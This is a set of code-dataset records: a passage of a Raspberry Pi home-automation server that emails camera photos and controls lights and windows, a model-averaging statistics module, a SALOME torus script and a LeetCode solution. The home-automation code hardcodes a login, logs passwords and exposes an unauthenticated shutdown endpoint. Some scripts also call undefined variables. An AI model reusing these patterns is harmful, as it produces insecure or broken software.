print('Messages: %s. Size: %s' % server.stat())\n # list()返回所有邮件的编号:\n resp, mails, octets = server.list()\n # 可以查看返回的列表类似[b'1 82923', b'2 2184', ...]\n # print(mails)\n\n # 获取最新一封邮件, 注意索引号从1开始:\n index = len(mails)\n resp, lines, octets = server.retr(index)\n\n # lines存储了邮件的原始文本的每一行,\n # 可以获得整个邮件的原始文本:\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n # 稍后解析出邮件:\n msg = Parser().parsestr(msg_content)\n fro, sub = print_info(msg)\n # print(sub)\n if \"1053604549@qq.com\" == fro:\n if \"枕边头套\" == sub:\n server.dele(index)\n if \"关灯\" == sub:\n await api_register_user()\n server.dele(index)\n if \"开灯\" == sub:\n await api_register_users()\n server.dele(index)\n if \"开窗\" == sub:\n chuangkan()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"关窗\" == sub:\n chuangguan()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"房间\" == sub:\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n if \"关窗开灯\" == sub:\n chuangguan()\n await api_register_users()\n file_url = take_camera()\n server.dele(index)\n sendEmailFile(file_url)\n # 关闭连接:\n server.quit()\n\n\n@get('/api/shutdownlinux')\ndef shutdownlinux():\n os.system(\"sudo shutdown -h now\")\n\n\n@get('/api/test')\ndef test():\n logging.info(\"test---test\")\n\n\n@get('/api/run')\nasync def run():\n '''\n 记录跑步的时间,这是我的个人生活\n '''\n await execute('insert into run_rec(state)values(?)', ('run'))\n return \"success\"\n\n\n@post('/api/login')\ndef login(*, username, passwd):\n logging.info(username + '-------------------------------' + passwd)\n if username == '001' and passwd == '123456':\n user = {'username': '001', 'passwd': '123456', 'id': '1', 'state': 'success'}\n r = web.Response()\n r.set_cookie(COOKIE_NAME, user2cookie(user, 86400), max_age=86400, httponly=True)\n user['passwd'] = '******'\n r.content_type = 'application/json'\n r.body = json.dumps(user, ensure_ascii=False).encode('utf-8')\n return r\n return \"error\"\n\n\n@get('/signin')\ndef signin():\n return \"login\"\n\n\n@get('/api/camera')\nasync def camera():\n '''\n 拍照,并在浏览器上显示\n '''\n 
file_url = take_camera()\n import base64\n img_stream = ''\n with open(file_url, 'rb') as img_f:\n img_stream = img_f.read()\n img_stream = base64.b64encode(img_stream)\n\n return img_stream\n\n\n@get('/api/shutdown')\nasync def shutdown():\n '''\n 用requests模块,发送关闭计算机的指令\n '''\n r0 = requests.get(\"http://W4HUDGN5ZEIGEHX:5000/shutdown\")\n return \"success\"\n\n\n@get('/api/kanchuang')\nasync def kanchuang():\n '''\n 控制窗户\n '''\n t = threading.Thread(target=chuangkan, name='LoopThread0')\n t.start()\n t.join\n return \"success\"\n\n\n@get('/api/guanchuang')\nasync def guanchuang():\n t = threading.Thread(target=chuangguan, name='LoopThread1')\n t.start()\n t.join\n return \"success\"\n\n\n@get('/api/stop')\nasync def stop():\n stopC()\n return \"success\"\n\n\n@get('/api/stopKong')\nasync def stopKong():\n '''t = threading.Thread(target=stop2, name='LoopThread0')\n t.start()\n t.join'''\n stop2();\n return \"success\"\n\n\n@get('/api/openKong')\nasync def openKong():\n zheng2()\n return \"success\"\n\n\n@get('/api/closeKong')\nasync def closeKong():\n fan2()\n return \"success\"\n\n\n@get('/api/kongKong')\nasync def kongKong():\n t = threading.Thread(target=kongtiao, name='kongtiao')\n t.start()\n t.join\n\n return \"success\"\n\n\n@get('/api/shutDown')\nasync def api_register_user():\n '''\n 关灯\n '''\n GPIO.output(12, GPIO.LOW)\n await execute('insert into light(state)values(?)', ('close'))\n global deng_state\n deng_state = 'close'\n return \"success\"\n\n\n@get('/api/open')\nasync def api_register_users():\n '''\n 开灯\n '''\n GPIO.output(12, GPIO.HIGH)\n await execute('insert into light(state)values(?)', ('open'))\n global deng_state\n deng_state = 'open'\n return \"success\"\n\n\n@get('/api/deng')\nasync def deng_caozuo():\n global deng_state\n if deng_state == 'close':\n GPIO.output(12, GPIO.HIGH)\n await execute('insert into light(state)values(?)', ('open'))\n deng_state = 'open'\n else:\n GPIO.output(12, GPIO.LOW)\n await execute('insert into light(state)values(?)', ('close'))\n deng_state = 'close'\n return \"success\"\n\n\n@get('/api/taideng')\nasync def taideng():\n GPIO.setup(16, GPIO.OUT)\n GPIO.output(16, GPIO.HIGH)\n time.sleep(4)\n GPIO.output(16, GPIO.LOW)\n return \"success\"\n\n\n@get('/api/showTem')\nasync def api_register_userss():\n res = await select('select temp,humidity,out_tem,out_hum from temp_hum order by add_time desc limit 1', ());\n return json.dumps(res[0])\n\n\n@get('/api/getTem')\ndef getTem():\n '''\n 获取室内温度与湿度\n '''\n sensor = Adafruit_DHT.DHT11\n gpio = 17\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n return {\n '温度': int(temperature),\n '湿度': int(humidity)\n }\n\n\n@get('/api/openVideo')\nasync def openVideo():\n '''\n 打开摄像头的进程,这个进程启动的是https://github.com/waveform80/pistreaming这个项目,\n 用进程来启动而不是用线程来启动这个项目,是因为进程能够,用代码来关闭\n '''\n p = Process(target=videoCmd)\n p.start()\n return \"success\"\n\n\n@get('/api/stopVideo')\nasync def stopVideo():\n '''\n 杀掉摄像的进程\n '''\n kill_video()\n return \"success\"\n\n\n@get('/api/stopNatapp')\nasync def stopNatapp():\n newRoomUrl()\n return \"success\"\n\n\n@get('/api/pauseSch')\nasync def pauseSch():\n '''\n 暂停任务\n '''\n pause_sch()\n return \"success\"\n\n\ndef getWeather():\n htmlData = request.urlopen(\"https://tianqi.moji.com/weather/china/shandong/lixia-district\").read().decode('utf-8')\n soup = BeautifulSoup(htmlData, 'html.parser')\n weather = soup.find('div', attrs={'class': \"wea_weather clearfix\"})\n temp1 = weather.find('em').get_text() # 当前温度\n temp2 = weather.find('b').get_text()\n AQI = 
soup.select(\".wea_alert.clearfix > ul > li > a > em\")[0].get_text()\n H = soup.select(\".wea_about.clearfix > span\")[0].get_text() # 湿度\n S = soup.select(\".wea_about.clearfix > em\")[0].get_text() # 风速\n return temp1, H\n\n\ndef start_sch():\n global sched\n sched = AsyncIOScheduler()\n # sched.add_job(sch_job, 'cron', hour='8-20', minute=\"*/10\",id='my_job_id')\n # sched.add_job(sendEmail,'cron',hour='22', minute=\"30\",args=[\"枕边头套\"],id='my_job_id2')\n sched.add_job(newRoomUrl, 'cron', hour='9', minute=\"30\", timezone=pytz.utc, id='my_job_id6')\n sched.add_job(tem_job, 'cron', minute=\"*/30\", id='my_job_id5')\n sched.add_job(resume_job, 'cron', hour='9', minute=\"30\", timezone=pytz.utc, id='my_job_id4')\n # sched.add_job(getHome_job, 'cron', day_of_week='mon-fri', hour='10-12', minute=\"*/1\", timezone=pytz.utc,id='my_job_id3')\n sched.add_job(getHome_job, 'cron',day_of_week='mon-fri', hour='10-12', second='*/5', timezone=pytz.utc,id='my_job_id3')\n sched.add_job(delMyUrl, 'cron', hour='15', timezone=pytz.utc, id='my_job_id7')\n sched.add_job(cpufengshan, 'cron', minute=\"*/10\", id='my_job_id8')\n sched.start()\n\n\ndef cpufengshan():\n file = open(\"/sys/class/thermal/thermal_zone0/temp\")\n # 读取结果,并转换为浮点数\n temp = float(file.read()) / 1000\n logging.info(\"cputemp++++++++\" + str(temp))\n if temp > 60:\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18, GPIO.HIGH)\n elif temp < 46:\n GPIO.setup(18, GPIO.OUT)\n GPIO.output(18, GPIO.LOW)\n\n\ndef delMyUrl():\n server = poplib.POP3(pop3_server)\n server.set_debuglevel(0)\n server.user(email)\n server.pass_(password)\n resp, mails, octets = server.list()\n for index in range(len(mails)):\n resp, lines, octets = server.retr(index + 1)\n msg_content = b'\\r\\n'.join(lines).decode('utf-8')\n msg = Parser().parsestr(msg_content)\n fro, sub, content = print_info(msg)\n if \"hello, send by Python...\" == content:\n server.dele(index + 1)\n # 关闭连接:\n server.quit()\n\n\ndef pause_sch():\n sched.get_job('my_job_id3').pause()\n\n\ndef resume_job():\n sched.get_job('my_job_id3').resume()\n\n\nasync def tem_job():\n '''\n 爬取天气\n '''\n out_temp, out_hum = getWeather()\n hum_index = out_hum.index(\"%\")\n out_hum = out_hum[3:hum_index]\n sensor = Adafruit_DHT.DHT11\n gpio = 17\n humidity, temperature = Adafruit_DHT.read_retry(sensor, gpio)\n await execute('insert into temp_hum(temp,humidity,out_tem,out_hum)values(?,?,?,?)',\n (temperature, humidity, out_temp, out_hum))\n\n\ndef sendEmail(suc):\n msg = MIMEText('hello, send by Python...', 'plain', 'utf-8')\n msg['From'] = _format_addr('你是谁 <%s>' % from_addr)\n msg['To'] = _format_addr('你是谁 <%s>' % to_addr)\n msg['Subject'] = Header(suc, 'utf-8').encode()\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(0)\n server.login(from_addr, password)\n server.sendmail(from_addr, [to_addr], msg.as_string())\n server.quit()\n\n\ndef _format_addr(s):\n name, addr = parseaddr(s)\n return formataddr((Header(name, 'utf-8').encode(), addr))\n\n\ndef chuangkan():\n zheng()\n time.sleep(7)\n stopC()\n\n\ndef chuangguan():\n fan()\n time.sleep(7)\n stopC()\n\n\ndef sendEmailFile(url):\n msg = MIMEMultipart()\n msg['From'] = _format_addr('你是谁 <%s>' % from_addr)\n msg['To'] = _format_addr('你是谁 <%s>' % to_addr)\n msg['Subject'] = Header('myroom', 'utf-8').encode()\n msg.attach(MIMEText('
<html><body><h1>Hello</h1>' +\n                   '<p><img src=\"cid:0\"></p>
' +\n '', 'html', 'utf-8'))\n # 添加附件就是加上一个MIMEBase,从本地读取一个图片:\n with open(url, 'rb') as f:\n # 设置附件的MIME和文件名,这里是png类型:\n mime = MIMEBase('image', 'jpg', filename='test.jpg')\n # 加上必要的头信息:\n mime.add_header('Content-Disposition', 'attachment', filename='test.jpg')\n mime.add_header('Content-ID', '<0>')\n mime.add_header('X-Attachment-Id', '0')\n # 把附件的内容读进来:\n mime.set_payload(f.read())\n # 用Base64编码:\n encoders.encode_base64(mime)\n # 添加到MIMEMultipart:\n msg.attach(mime)\n server = smtplib.SMTP(smtp_server, 25)\n server.set_debuglevel(0)\n server.login(from_addr, password)\n server.sendmail(from_addr, [to_addr], msg.as_string())\n server.quit()\n\n\ndef take_camera():\n file_url = \"\"\n with PiCamera() as camera:\n time.sleep(0.5)\n camera.resolution = (320, 240)\n file_url = \"/home/pi/img/\" + str(int(time.time())) + \".jpg\"\n camera.capture(file_url)\n return file_url\n\n\nasync def getHome_job():\n if deng_state == \"close\":\n if GPIO.input(40) == 1:\n # print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + \" Smoe is here !\")\n chuangguan()\n await api_register_users()\n # else:\n # print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())) + \" Nobody !\")\n\ndef videoCmd():\n val = os.system(\"python3.7 /home/pi/web/www/server.py\")\n\n\ndef kongtiao():\n zheng2()\n time.sleep(1)\n stop2()\n time.sleep(0.5)\n fan2()\n time.sleep(1)\n stop2()\n\n\ndef newRoomUrl():\n url = \"\"\n index_url = \"\"\n file_data = \"\"\n file_url = \"/home/pi/natapp/myvideo/\"\n html_url = \"/home/pi/natapp/\"\n file_html = '/home/pi/web/www/static/index.html'\n kill_natapp()\n if (os.path.exists(html_url + 'nohup.out')):\n os.remove(html_url + 'nohup.out')\n os.system(\"nohup \" + html_url + \"natapp > \" + html_url + \"nohup.out &\")\n time.sleep(1)\n if (os.path.exists(file_url + 'nohup.out')):\n os.remove(file_url + 'nohup.out')\n os.system(\"nohup \" + file_url + \"natapp > \" + file_url + \"nohup.out &\")\n time.sleep(1)\n with open(html_url + 'nohup.out', 'r') as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"established at\") > 0:\n index_url = line.split(\"established at\")[1].strip()\n with open(file_url + 'nohup.out', 'r') as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"established at\") > 0:\n url = line.split(\"established at\")[1].strip()\n logging.info(\"+++++++\" + index_url)\n with open(file_html, 'r', encoding=\"utf-8\") as f:\n text_lines = f.readlines()\n for line in text_lines:\n if line.find(\"//update\") > 0:\n line = \"var videoUrl ='\" + url + \"';//update\\n\"\n logging.info(line)\n file_data += line\n with open(file_html, \"w\", encoding=\"utf-8\") as f:\n f.write(file_data)\n sendEmail(index_url)\n","repo_name":"zsdnishishui/myroom","sub_path":"www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":18615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"33758410001","text":"import numpy as np\nimport gvar as gv\nimport lsqfit\nimport jax\nimport jax.numpy as jnp\nimport vegas\n\njax.config.update(\"jax_enable_x64\", True)\n\n# Info criteria\ndef BAIC_fit(fr):\n prior_stats = prior_stats_fit(fr)\n chi2_prior = prior_stats['chi2_prior']\n \n BAIC = fr.chi2 - chi2_prior + 2 * len(fr.p.keys())\n return BAIC\n\n\ndef BPIC_linear_fit(fr, test_data, design_mat):\n tensors = tensors_linear_fit(fr, test_data, design_mat)\n chi2_prior = tensors['chi2_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = 
tensors['cov_best_fit']\n \n BPIC = fr.chi2 - chi2_prior - 0.5 * np.einsum('ba,ab->', hess_prior, cov_best_fit) + 3 * len(fr.p.keys())\n\n return BPIC\n\ndef BPIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n grad_prior = tensors['grad_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = tensors['cov_best_fit_2']\n T = tensors['T']\n\n \n int_lead = -chi2_prior\n int_sub = -0.5 * np.einsum('ba,ab->', hess_prior, cov_best_fit) + 0.5 * np.einsum('d,cba,abcd->', grad_prior, T, cov_best_fit_2)\n\n if np.abs(int_sub) < np.abs(int_lead):\n integral = int_lead + int_sub\n else:\n integral = int_lead\n \n BPIC = fr.chi2 + integral + 3 * len(fr.p.keys())\n return BPIC\n\n\ndef PPIC_linear_fit(fr, test_data, design_mat):\n tensors = tensors_linear_fit(fr, test_data, design_mat)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n cov_best_fit = tensors['cov_best_fit']\n \n yraw = test_data['yraw']\n delta_indv = yraw - gv.mean(fr.fcn(fr.x,fr.p))\n grad_indv_data = -2 * np.einsum('ba,bc,dc->da', design_mat, cov_data_inv, delta_indv)\n hess_indv_data = 2 * np.einsum('ba,bc,cd->ad', design_mat, cov_data_inv, design_mat)\n \n log_args = 1 + 0.5 * np.einsum('cba,ab->c', 0.25 * np.einsum('ab,ac->abc', grad_indv_data, grad_indv_data) - 0.5 * hess_indv_data, cov_best_fit)\n\n PPIC = fr.chi2 - chi2_prior - 2 * np.sum(np.log(log_args)) + 2 * len(fr.p.keys())\n \n return PPIC\n\ndef PPIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = tensors['cov_best_fit_2']\n T = tensors['T']\n \n \n yraw = test_data['yraw']\n delta_indv = yraw - gv.mean(fr.fcn(fr.x,fr.p))\n grad_indv_data = -2 * np.einsum('ba,bc,dc->da', model_derivs['d1_model'], cov_data_inv, delta_indv)\n hess_indv_data = 2 * (-np.einsum('cba,cd,ed->eab', model_derivs['d2_model'], cov_data_inv, delta_indv) + np.einsum('ba,bc,cd->ad', model_derivs['d1_model'], cov_data_inv, model_derivs['d1_model']))\n \n int_leads = 1.0\n int_subs = 0.5 * np.einsum('cba,ab->c', 0.25 * np.einsum('ab,ac->abc', grad_indv_data, grad_indv_data) - 0.5 * hess_indv_data, cov_best_fit) + 0.25 * np.einsum('ed,cba,abcd->e', grad_indv_data, T, cov_best_fit_2)\n \n int_subs[np.abs(int_subs)>=np.abs(int_leads)]=0\n \n log_args=int_leads+int_subs\n \n PPIC = fr.chi2 - chi2_prior - 2 * np.sum(np.log(log_args)) + 2 * len(fr.p.keys())\n return PPIC\n\n\ndef AIC_fit(fr):\n AIC = fr.chi2 + 2 * len(fr.p.keys())\n return AIC\n\n\ndef PAIC_linear_fit(fr, test_data, design_mat):\n PAIC = BPIC_linear_fit(fr, test_data, design_mat)\n return PAIC\n\ndef PAIC_from_vegas(fr):\n def chi_sq(p):\n return gv.chi2(fr.y, fr.fcn(fr.x, p))\n\n def pdf(p):\n return np.exp(-chi_sq(p)/2)\n\n exp_val = vegas.PDFIntegrator(fr.p, pdf=pdf, limit=20)\n\n try:\n integral = exp_val(chi_sq, neval=100, nitn=8)\n except ValueError:\n return 999.\n\n PAIC = gv.mean(integral + 2 * len(fr.p.keys()))\n\n return PAIC\n \ndef PAIC_nonlinear_fit(fr, test_data, model_derivs):\n tensors = tensors_nonlinear_fit(fr, test_data, model_derivs)\n cov_data_inv = tensors['cov_data_inv']\n chi2_prior = tensors['chi2_prior']\n hess_prior = tensors['hess_prior']\n cov_best_fit = tensors['cov_best_fit']\n cov_best_fit_2 = 
tensors['cov_best_fit_2']\n T = tensors['T']\n \n \n ND = test_data['ND']\n delta = gv.mean(fr.y) - gv.mean(fr.fcn(fr.x,fr.p))\n chi2_data = fr.chi2 - chi2_prior\n grad_data = -2 * np.einsum('ba,bc,c->a', model_derivs['d1_model'], ND * cov_data_inv, delta)\n \n \n int_lead = chi2_data\n int_sub = len(fr.p.keys())\n\n if np.abs(int_sub) < np.abs(int_lead):\n integral = int_lead + int_sub\n else:\n integral = int_lead\n \n PAIC = integral + 2 * len(fr.p.keys())\n return PAIC\n\n\ndef naive_fit(fr):\n return fr.chi2\n\n\n\ndef get_model_IC(fr, test_data, design_mat=None, model_derivs=None, IC=\"BAIC\", return_prob=False, full_BC=False, quiet_full_BC=False):\n \"\"\"\n Compute incfomration criteria from log likelihood (LL) for a given fit.\n space of all models, which should be done separately.\n Relation to info criteria:\n LL = -1/2 * IC\n Args:\n fr: Fit result object, from lsqfit module.\n test_data: dictionay of data\n design_mat: Default None. The design matrix for linear fits\n model_derivs: Default None. Dictionary of model derivatives for nonlinear fits\n IC: Which info criterion to use. Options: BAIC (default), AIC, BPIC, PAIC, PPIC, naive.\n return_prob: Specifies if model probability is returned\n full_BC: specifies if the full bias correction is used\n quiet_full_BC: Suppresses full_BC warning in cases of data subset selection.\n Returns:\n IC: the information criteria value\n np.exp(LL): the (unnormalized) model probability\n \"\"\"\n \n if design_mat is None:\n if model_derivs is None:\n assert IC == \"AIC\" or IC == \"BAIC\" or IC == \"naive\"\n else:\n assert 'd1_model' in model_derivs.keys()\n assert 'd2_model' in model_derivs.keys()\n assert 'd3_model' in model_derivs.keys()\n is_linear = False\n else:\n is_linear = True\n \n\n if IC == \"BAIC\":\n LL = -0.5 * BAIC_fit(fr)\n elif IC == \"BPIC\":\n if is_linear:\n LL = -0.5 * BPIC_linear_fit(fr, test_data, design_mat)\n else: \n LL = -0.5 * BPIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"PPIC\":\n if is_linear:\n LL = -0.5 * PPIC_linear_fit(fr, test_data, design_mat)\n else:\n LL = -0.5 * PPIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"AIC\":\n LL = -0.5 * AIC_fit(fr)\n elif IC == \"PAIC\":\n if is_linear:\n LL = -0.5 * PAIC_linear_fit(fr, test_data, design_mat)\n else:\n LL = -0.5 * PAIC_nonlinear_fit(fr, test_data, model_derivs)\n elif IC == \"naive\":\n LL = -0.5 * naive_fit(fr)\n else:\n raise ValueError(f\"Unrecognized choice of info criterion: {IC}\")\n\n # Correction to IC is +2*dc - except for naive IC, which ignores this\n if 't_cut' in test_data.keys() and IC != \"naive\":\n dc = len(test_data['t_cut'])\n LL -= dc\n \n if IC != \"naive\" and IC != \"BAIC\" and IC != \"AIC\":\n # Replace +2*k with full bias correction, if option is set\n if full_BC:\n tr_B = full_bias(fr, test_data, model_derivs)\n if 't_cut' in test_data.keys() and len(test_data['t_cut'])>0 and not quiet_full_BC:\n print(\"Warning: Full bias correction neglects long-range correlations. 
Consider using +2k instead.\")\n \n tr_B = full_bias(fr, model_derivs, ND, yraw)\n\n LL += len(fr.p.keys())\n LL -= tr_B\n\n IC = -2 * LL\n \n if return_prob:\n return IC, np.exp(LL)\n else:\n return IC\n\n \n\ndef model_avg(gv_list, pr_list):\n \"\"\"\n Given a list of single-model expectation values {_M} as gvars,\n and a list of raw model probabilities, return the model-averaged estimate\n for as a gvar.\n \"\"\"\n\n # Ensure model probabilities are normalized to 1\n pr_list /= np.sum(pr_list)\n\n mean_avg = np.sum(gv.mean(gv_list) * pr_list)\n var_avg = np.sum(gv.var(gv_list) * pr_list)\n var_avg += np.sum(gv.mean(gv_list) ** 2 * pr_list)\n var_avg -= (np.sum(gv.mean(gv_list) * pr_list)) ** 2\n\n return gv.gvar(mean_avg, np.sqrt(var_avg))\n\n\n\ndef tensors_linear_fit(fr, test_data, design_mat):\n \"\"\"\n Computes relevant tensors for linear fits.\n \"\"\"\n \n ND = test_data['ND']\n\n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data)\n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n chi2_prior = prior_stats['chi2_prior']\n grad_prior = prior_stats['grad_prior']\n hess_prior = prior_stats['hess_prior']\n \n cov_best_fit = np.linalg.inv(cov_prior_inv + ND * design_mat.T @ cov_data_inv @ design_mat)\n \n return {'cov_data_inv': cov_data_inv,\n 'chi2_prior': chi2_prior,\n 'hess_prior': hess_prior,\n 'cov_best_fit': cov_best_fit,\n }\n\ndef tensors_nonlinear_fit(fr, test_data, model_derivs):\n \"\"\"\n Computes relevant tensors for nonlinear fits.\n \"\"\"\n \n ND = test_data['ND']\n \n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data) \n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n chi2_prior = prior_stats['chi2_prior']\n grad_prior = prior_stats['grad_prior']\n hess_prior = prior_stats['hess_prior']\n \n d1_chi2, d2_chi2, d3_chi2 = chi2_derivatives(fr, model_derivs, test_data, chi2_i=False, calc_d3=True)\n \n cov_best_fit = np.linalg.inv(d2_chi2 / 2)\n cov_best_fit_2 = 3 * np.einsum('ab,cd->abcd', cov_best_fit, cov_best_fit)\n \n T = d3_chi2 / 6\n \n return {'cov_data_inv': cov_data_inv,\n 'chi2_prior': chi2_prior,\n 'grad_prior': grad_prior,\n 'hess_prior': hess_prior,\n 'cov_best_fit': cov_best_fit,\n 'cov_best_fit_2': cov_best_fit_2,\n 'T': T\n }\n\n\n\ndef prior_stats_fit(fr):\n \"\"\"\n Computes prior statistics from fit object.\n \"\"\"\n \n cov_prior = np.zeros((len(fr.prior.flat), len(fr.prior.flat)), float)\n blocks = gv.evalcov_blocks(fr.prior, compress=True)\n # uncorrelated pieces are diagonal\n idx, sdev = blocks[0]\n cov_prior[idx, idx] = sdev ** 2\n # correlated pieces\n for idx, bcov in blocks[1:]:\n cov_prior[idx[:, None], idx] = bcov\n \n cov_prior_inv = np.linalg.inv(cov_prior)\n \n p_prior = gv.mean(fr.prior.values())\n p_best_fit = gv.mean(fr.p.values())\n \n chi2_prior = (p_best_fit - p_prior).T @ cov_prior_inv @ (p_best_fit - p_prior)\n grad_prior = 2 * cov_prior_inv @ (p_best_fit - p_prior)\n hess_prior = 2 * cov_prior_inv\n \n return {'cov_prior_inv': cov_prior_inv,\n 'chi2_prior': chi2_prior,\n 'grad_prior': grad_prior,\n 'hess_prior': hess_prior,\n }\n\ndef chi2_derivatives(fr, model_derivs, test_data, chi2_i=True, calc_d3=True):\n \"\"\"\n Compute and return derivatives of the chi-squared function.\n\n Args:\n fr: Fit result object.\n model_derivs: Model derivatives dictionary (defined in synth_data.py.)\n test_data: Data dictionary.\n chi2_i: If \"True\", compute derivatives of the individual \\chi_i^2 functions, \n return as an 
array over the sample index. Otherwise, compute derivatives\n of the average chi-squared.\n calc_d3: If \"True\", compute and return the third derivative, otherwise skip it\n to reduce computational cost.\n\n Returns:\n An array of derivatives of up to length 3 (if calc_d3 is True.)\n \"\"\"\n\n ND = test_data['ND']\n\n cov_data = ND * gv.evalcov(fr.y)\n cov_data_inv = np.linalg.inv(cov_data) \n \n prior_stats = prior_stats_fit(fr)\n cov_prior_inv = prior_stats['cov_prior_inv']\n \n p_prior = gv.mean(fr.prior.values())\n p_best_fit = gv.mean(fr.p.values())\n \n \n if chi2_i:\n delta = test_data['yraw'] - gv.mean(fr.fcn(fr.x, fr.p))\n else:\n delta = gv.mean(fr.y) - gv.mean(fr.fcn(fr.x,fr.p))\n \n d1_model = model_derivs['d1_model']\n d2_model = model_derivs['d2_model']\n d3_model = model_derivs['d3_model']\n \n if chi2_i:\n d1_chi2 = 2 * (np.einsum('ab,b->a', cov_prior_inv, p_best_fit-p_prior)/ND - np.einsum('ba,bc,ic->ia', d1_model, cov_data_inv, delta))\n d2_chi2 = 2 * (cov_prior_inv/ND - np.einsum('cba,cd,id->iab', d2_model, cov_data_inv,delta) + np.einsum('ba,bc,cd->ad', d1_model, cov_data_inv, d1_model))\n else:\n d1_chi2 = 2 * (np.einsum('ab,b->a', cov_prior_inv, p_best_fit-p_prior) - np.einsum('ba,bc,c->a', d1_model, ND * cov_data_inv, delta))\n d2_chi2 = 2 * (cov_prior_inv - np.einsum('cba,cd,d->ab', d2_model, ND * cov_data_inv,delta) + np.einsum('ba,bc,cd->ad', d1_model, ND * cov_data_inv, d1_model))\n\n if calc_d3:\n if chi2_i:\n d3_chi2 = 2 * (-np.einsum('dcba,de,ie->iabc', d3_model, cov_data_inv, delta) + (np.einsum('cba,cd,de->abe', d2_model, cov_data_inv, d1_model) + np.einsum('cba,cd,de->aeb', d2_model, cov_data_inv, d1_model) + np.einsum('cba,cd,de->eab', d2_model, cov_data_inv, d1_model)))\n else:\n d3_chi2 = 2 * (-np.einsum('dcba,de,e->abc', d3_model, ND * cov_data_inv, delta) + (np.einsum('cba,cd,de->abe', d2_model, ND * cov_data_inv, d1_model) + np.einsum('cba,cd,de->aeb', d2_model, ND * cov_data_inv, d1_model) + np.einsum('cba,cd,de->eab', d2_model, ND * cov_data_inv, d1_model)))\n \n return [d1_chi2, d2_chi2, d3_chi2]\n else:\n return [d1_chi2, d2_chi2]\n\n\ndef full_bias(fr, test_data, model_derivs):\n \"\"\"\n Computes the full bias correction.\n \"\"\"\n\n d1_chi2, d2_chi2 = chi2_derivatives(fr, model_derivs, test_data, chi2_i=True, calc_d3=False)\n\n J = np.sum(d2_chi2, axis=0) / (2*test_data['ND'])\n\n I = np.einsum('ia,ib->ab', d1_chi2, d1_chi2) / (4 * (test_data['ND']-1))\n\n tr_term = np.linalg.inv(J) @ I\n\n return np.trace(tr_term)\n","repo_name":"jwsitison/improved_model_avg_paper","sub_path":"improved_model_averaging/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"23257220351","text":"import geompy\nimport salome\ngg = salome.ImportComponentGUI(\"GEOM\")\n\n#creamos dos vertices y un vector\n#p1 = geompy.MakeVertex(35, 40, 45)\n#p2 = geompy.MakeVertex(35, 45, 70)\n#v = geompy.MakeVector(p1, p2)\n\n#creamos los toroides\n#torus1 = geompy.MakeTorus(p1, v, 20, 10)\ntorus2 = geompy.MakeTorusRR(300, 150)\n\n#agregamos los objetos al estudio\nid_torus1 = geompy.addToStudy(torus1,\"Torus1\")\nid_torus2 = geompy.addToStudy(torus2,\"Torus2\")\n\n#dibujamos los 
toroides\ngg.createAndDisplayGO(id_torus1)\ngg.setDisplayMode(id_torus1,1)\ngg.createAndDisplayGO(id_torus2)\ngg.setDisplayMode(id_torus2,1)\n","repo_name":"m0nT3cR1s70/salomeToRoot","sub_path":"examples/torus/torus.py","file_name":"torus.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2374185549","text":"class Solution(object):\n def maxSubArrayLen(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n\n Given an array nums and a target value k, find the maximum length of a subarray that sums to k. If there isn't one, return 0 instead.\n\n Note:\n The sum of the entire nums array is guaranteed to fit within the 32-bit signed integer range.\n\n Example 1:\n Given nums = [1, -1, 5, -2, 3], k = 3,\n return 4. (because the subarray [1, -1, 5, -2] sums to 3 and is the longest)\n\n Example 2:\n Given nums = [-2, -1, 2, 1], k = 1,\n return 2. (because the subarray [-1, 2] sums to 1 and is the longest)\n\n Follow Up:\n Can you do it in O(n) time?\n \"\"\"\n subarr_len = 0\n running_sum = 0\n my_dict = {0: -1} # whenever running sum is 0, value at my_dict[0] remains -1. this is good\n # because we want consecutive values in sub array that total to 0 inorder to get longest\n # subarray that totals to k\n\n # What made running sum increase?\n # If it increased by \"k\", that means\n # there are elements that sum to exactly\n # \"k\" in between.\n for i in range(len(nums)):\n running_sum += nums[i]\n if running_sum not in my_dict:\n my_dict[running_sum] = i\n if running_sum-k in my_dict:\n # if true, running sum increased by k\n subarr_len = max(subarr_len, i-my_dict[running_sum-k])\n print(my_dict)\n return subarr_len\n\n\n\nsoln = Solution()\nprint(soln.maxSubArrayLen([1, 2, 3, 4, 2, 9, 3, 6], 9))\n #running sum 1 3 6 10 12 